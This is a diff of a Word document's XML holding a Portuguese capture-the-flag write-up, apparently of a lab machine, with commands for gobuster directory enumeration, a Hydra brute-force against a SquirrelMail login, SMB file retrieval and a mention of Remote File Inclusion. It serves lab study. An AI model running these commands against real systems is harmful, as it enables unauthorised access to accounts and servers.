-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t>Comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> gobuster dir -w /usr/share/dirb/wordlists/common.txt -u  http://</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dir</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -w /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/share/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dirb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/wordlists/common.txt -</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>u  http</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>://</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2486,7 +3183,71 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Após a análise do gobuster, foi possível acessar o “squirrelmail” , o email do nosso alvo.</w:t>
+        <w:t xml:space="preserve">Após a análise do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, foi possível acessar o “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>squirrelmail</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>” ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do nosso alvo.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2555,15 +3316,69 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Com o Hydra, o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bruteforce vai ser realizado  e também a resposta da primeira pergunta.</w:t>
+        <w:t xml:space="preserve">Com o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Hydra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>bruteforce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vai ser </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>realizado  e</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> também a resposta da primeira pergunta.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2575,6 +3390,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2584,34 +3400,130 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Comando usado:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t>Comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> hydra -l mile</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>sdyson -P log1.txt &lt;ip_target&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t>usado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> http-post-form "/squirrelmail/src/login.php:login_username=^USER^&amp;secretkey=^PASS^&amp;js_autodetect_results=1&amp;just_logged_in=1:Unknown user or password incorrect."</w:t>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hydra -l </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>mile</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sdyson</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -P log1.txt &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip_target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> http-post-form "/squirrelmail/src/login.php:login_username=^USER^&amp;secretkey=^PASS^&amp;js_autodetect_results=1&amp;just_logged_in=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>1:Unknown</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> user or password incorrect."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2720,7 +3632,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Com o acesso ao email, e olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba client do Miles.</w:t>
+        <w:t xml:space="preserve">Com o acesso ao </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, e olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>client</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do Miles.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2810,7 +3758,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>A senha estava correta, agora só dar uma olhada no arquivos e no diretório “notes”</w:t>
+        <w:t xml:space="preserve">A senha estava correta, agora só dar uma olhada </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>no arquivos</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e no diretório “notes”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2932,7 +3898,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mget importante.txt</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>mget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> importante.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3145,8 +4129,22 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Remote File Inclusion</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Remote File </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Inclusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3276,7 +4274,85 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> isso, é necessário usar novamente o gobuster, pórem agora com o novo diretório. Achando o “ /administrator”</w:t>
+        <w:t xml:space="preserve"> isso, é necessário usar novamente o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>pórem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> agora com o novo diretório. Achando o </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>“ /</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>administrator”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3316,6 +4392,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3326,8 +4403,9 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>gobuster dir -w /usr/share/dirb/wordlists</w:t>
-      </w:r>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3338,7 +4416,163 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>/common.txt -u  http://&lt;ip_target&gt;</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dir</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -w /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>share</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dirb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>wordlists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
